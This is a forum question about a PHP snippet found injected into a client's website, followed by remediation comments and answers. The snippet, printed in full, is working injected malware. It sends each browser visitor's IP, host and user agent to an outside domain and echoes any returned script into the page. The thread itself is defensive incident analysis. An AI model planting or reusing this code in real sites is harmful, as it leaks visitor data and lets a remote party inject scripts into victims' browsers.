# Malicious code found on client's website

Tags: javascript, php

We got a call from a client that their website was broken, only loading partially. When looking through the code on the site I found this snippet:

```
<?php
#9da223#
error_reporting(0); 
ini_set('display_errors',0); 

$wp_nht097 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_nht097) 
    && !preg_match ('/bot/i', $wp_nht097))) {
  $wp_nht09097 = 
    "http://" . "error" . "class" . ".com/class" . "/?ip=".$_SERVER['REMOTE_ADDR']
    ."&    referer=" . urlencode($_SERVER['HTTP_HOST'])
    ."&ua=" . urlencode($wp_nht097);

  $ch = curl_init(); 
  curl_setopt($ch, CURLOPT_URL,$wp_nht09097);
  curl_setopt($ch, CURLOPT_TIMEOUT, 6); 
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
  $wp_097nht = curl_exec ($ch); 
  curl_close($ch);
}
if ( substr($wp_097nht,1,3) === 'scr' ){ 
  echo $wp_097nht; 
}
#/9da223#
?>
```

The site stopped working because of an undefined function on one of the "curl_"-functions in the code above.

From what I can gather it tries to get content from errorclass.com, passing along the domain, user ip and user agent and in response it looks for a script-tag, and if it finds one, it will print the response to the document.

I tried to see what was being requested but at the moment the site only appears to return a completely empty document.

The domain traces back to China and the IP-address associated with the domain goes to the Netherlands.

Anyone seen anything similar to this before?

The client hosts various other sites on the same server and none of them appear to be compromised, thankfully.

Edit:

I dug a little deeper the sites hosted and it appears several of them were compromised. The original site wasn't a Wordpress-site, but another one was. It appears some form of bot did the edits as they all were edited the same time, 12:55 PM this past Tuesday (Jan 21st).

All sites we make we give the client full control over after we install on the server of the client choice. Hence why it took some time for us to made aware of the problem.

Comment: Compare the whole site with your last backup or repo snapshot. If there's a content database, restore the last known safe version. Use a security scanner or reputable security company to run SQL injection and XSS tests over your site.

Comment: Is your wordpress instances up to date? You always have to keep up with the updating for the security fixes.

Comment: And change the passwords, make sure you use sftp instead of ftp.

Comment: Simple code injector. Probably for linking.

Comment: If you have several sites on this server, run them all under different usernames - if they are all "www" or "apache" then a successful breach of one will compromise them all, and make it harder to work out how they got in.

Answer (score 1):

It's a "virus", there are many other code injections like that. It's the common issue, once I had entire dedicated server filled with similar code. I would suggest that you make a backup of the infected file and remove questionable part of the code. Note that it's quite likely that you had other php/html files infected as well so do a throughout search for that over the hosted files.

Answer (score 0):

(this should be a comment - but it's a bit long)

> Anyone seen anything similar to this before?

Anyone who answers this as 'yes' is presumably going to be as confused as you are.

What purpose does the question serve?

There are much more important, urgent and interesting questions to be asking right now.

The most significant of which are:

1. How did this happen?
2. Why didn't you know about it sooner?

(BTW: to the various people whom have already said, and will say 'restore from last known good backup' - that's obvious. The hard thing is knowing what is a good backup - it's the last one without the VULNERABILITY not the last one without the SYMPTOMS)